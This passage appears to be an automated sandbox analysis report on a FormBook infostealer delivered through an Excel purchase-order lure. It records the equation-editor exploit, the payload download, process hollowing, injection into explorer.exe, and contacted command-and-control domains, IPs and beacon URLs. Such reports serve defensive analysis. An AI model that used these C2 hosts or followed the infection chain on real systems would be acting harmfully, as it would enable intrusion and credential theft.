          Source: explorer.exe, 00000008.00000000.2172476527.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C10030 GetLocalTime,__swprintf,5_2_00C10030
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C10722 GetUserNameW,5_2_00C10722
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C0416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_00C0416A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403461

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: acqyswhf.exeBinary or memory string: WIN_81
          Source: acqyswhf.exeBinary or memory string: WIN_XP
          Source: acqyswhf.exeBinary or memory string: WIN_XPe
          Source: acqyswhf.exeBinary or memory string: WIN_VISTA
          Source: acqyswhf.exeBinary or memory string: WIN_7
          Source: acqyswhf.exeBinary or memory string: WIN_8
          Source: dtz25z5e9sr.exe, 00000006.00000000.2164172039.00000000004B6000.00000002.00020000.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools11Input Capture11System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer4Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsApplication Shimming1Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Access Token Manipulation1Obfuscated Files or Information31Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsCommand and Scripting Interpreter2Logon Script (Mac)Process Injection612Software Packing11NTDSSystem Information Discovery16Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsSecurity Software Discovery241VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncVirtualization/Sandbox Evasion2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection612Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 344798 Sample: Purchase Order.xlsx Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 51 www.aspiringeyephotos.com 2->51 53 aspiringeyephotos.com 2->53 69 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->69 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 12 other signatures 2->75 12 EQNEDT32.EXE 13 2->12         started        17 EXCEL.EXE 37 19 2->17         started        signatures3 process4 dnsIp5 55 cdn.discordapp.com 162.159.130.233, 443, 49165 CLOUDFLARENETUS United States 12->55 45 C:\Users\user\...\scancopy87867678[1].exe, PE32 12->45 dropped 47 C:\Users\Public\vbc.exe, PE32 12->47 dropped 93 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->93 19 vbc.exe 13 12->19         started        49 C:\Users\user\Desktop\~$Purchase Order.xlsx, data 17->49 dropped file6 signatures7 process8 file9 41 C:\Users\user\AppData\Local\...\acqyswhf.exe, PE32 19->41 dropped 77 Machine Learning detection for dropped file 19->77 23 acqyswhf.exe 1 19->23         started        signatures10 process11 file12 43 C:\Users\user\AppData\...\dtz25z5e9sr.exe, PE32 23->43 dropped 79 Writes to foreign memory regions 23->79 81 Maps a DLL or memory area into another process 23->81 83 Sample uses process hollowing technique 23->83 27 dtz25z5e9sr.exe 23->27         started        signatures13 process14 signatures15 85 Multi AV Scanner detection for dropped file 27->85 87 Detected unpacking (changes PE section rights) 27->87 89 Modifies the context of a thread in another process (thread injection) 27->89 91 4 other signatures 27->91 30 explorer.exe 27->30 injected process16 dnsIp17 57 land-il.com 50.87.169.249, 49166, 80 UNIFIEDLAYER-AS-1US United States 30->57 59 www.bmtxm.com 103.209.233.78, 49171, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Hong Kong 30->59 61 9 other IPs or domains 30->61 95 System process connects to network (likely due to code injection or exploit) 30->95 34 svchost.exe 30->34         started        37 autofmt.exe 30->37         started        signatures18 process19 signatures20 63 Modifies the context of a thread in another process (thread injection) 34->63 65 Maps a DLL or memory area into another process 34->65 67 Tries to detect virtualization through RDTSC time measurements 34->67 39 cmd.exe 34->39         started        process21

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Purchase Order.xlsx24%ReversingLabsDocument-Office.Trojan.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe5%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe21%ReversingLabsWin32.PUA.Wacapew

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.acqyswhf.exe.220000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          4.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          6.1.dtz25z5e9sr.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.dtz25z5e9sr.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          land-il.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://www.bmtxm.com/j5an/?3fk=6SPexGd0ZJ0Mz+FJ+cy7OLUKwTeaGjB/WusfxloW69kYZYqYrDfxiIlikZagIGHK+b+BQQ==&9rO4=E4xhcD5XlJSXW0%Avira URL Cloudsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://www.land-il.com/j5an/?3fk=jkLgRzxvTxu7277EKfJN7tKRHYJxZ3c6o/hCpD9wXnjOSj4zaLYT7gQTd+fjCtE9cXdA/Q==&9rO4=E4xhcD5XlJSXW0%Avira URL Cloudsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://www.streamelemeants.com/j5an/?3fk=hrvp4+cUQU8zV/SJvc4Npds81eds1Wb4LfPiDx6kUcwrGKBrK/T3B2SdIv8rg9j1CS48fg==&9rO4=E4xhcD5XlJSXW0%Avira URL Cloudsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://www.mct.ltd/j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXW0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          land-il.com
          50.87.169.249
          truetrueunknown
          www.streamelemeants.com
          81.17.18.195
          truetrue
            unknown
            www.fsjinhua.net
            23.228.109.141
            truetrue
              unknown
              www.bmtxm.com
              103.209.233.78
              truetrue
                unknown
                cdn.discordapp.com
                162.159.130.233
                truefalse
                  high
                  aspiringeyephotos.com
                  34.102.136.180
                  truetrue
                    unknown
                    www.mct.ltd
                    104.21.47.75
                    truetrue
                      unknown
                      www.chenangopistolpermit.com
                      208.92.209.208
                      truetrue
                        unknown
                        www.land-il.com
                        unknown
                        unknowntrue
                          unknown
                          www.aspiringeyephotos.com
                          unknown
                          unknowntrue
                            unknown
                            www.aulbalu.com
                            unknown
                            unknowntrue
                              unknown
                              www.chuanxingtong.com
                              unknown
                              unknowntrue
                                unknown
                                www.dchasers.net
                                unknown
                                unknowntrue
                                  unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.bmtxm.com/j5an/?3fk=6SPexGd0ZJ0Mz+FJ+cy7OLUKwTeaGjB/WusfxloW69kYZYqYrDfxiIlikZagIGHK+b+BQQ==&9rO4=E4xhcD5XlJSXWtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.land-il.com/j5an/?3fk=jkLgRzxvTxu7277EKfJN7tKRHYJxZ3c6o/hCpD9wXnjOSj4zaLYT7gQTd+fjCtE9cXdA/Q==&9rO4=E4xhcD5XlJSXWtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.streamelemeants.com/j5an/?3fk=hrvp4+cUQU8zV/SJvc4Npds81eds1Wb4LfPiDx6kUcwrGKBrK/T3B2SdIv8rg9j1CS48fg==&9rO4=E4xhcD5XlJSXWtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.mct.ltd/j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXWtrue
                                  • Avira URL Cloud: safe
                                  unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://search.chol.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://www.mercadolivre.com.br/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://search.ebay.de/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://www.mtv.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://www.rambler.ru/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://www.nifty.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://www.dailymail.co.uk/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www3.fnac.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://buscar.ya.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://search.yahoo.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://www.sogou.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://asp.usatoday.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://fr.search.yahoo.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://rover.ebay.comexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://in.search.yahoo.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://search.ebay.in/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://%s.comexplorer.exe, 00000008.00000000.2195645892.000000000A330000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                low
                                                                http://msk.afisha.ru/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://search.rediff.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://www.windows.com/pctv.explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.autoitscript.com/autoit3/Jvbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000000.2162676432.0000000000C99000.00000002.00020000.sdmp, dtz25z5e9sr.exe, 00000006.00000000.2164218683.00000000004C9000.00000002.00020000.sdmpfalse
                                                                        high
                                                                        http://www.ya.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://it.search.dada.net/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://search.naver.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://www.google.ru/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://search.hanafos.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.abril.com.br/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://search.daum.net/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://search.naver.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.clarin.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://buscar.ozu.es/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://kr.search.yahoo.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://search.about.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://busca.igbusca.com.br/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.ask.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.priceminister.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.cjmall.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://search.centrum.cz/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://suche.t-online.de/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.google.it/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://search.auction.co.kr/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.ceneo.pl/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://www.amazon.de/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmpfalse
                                                                                                            high
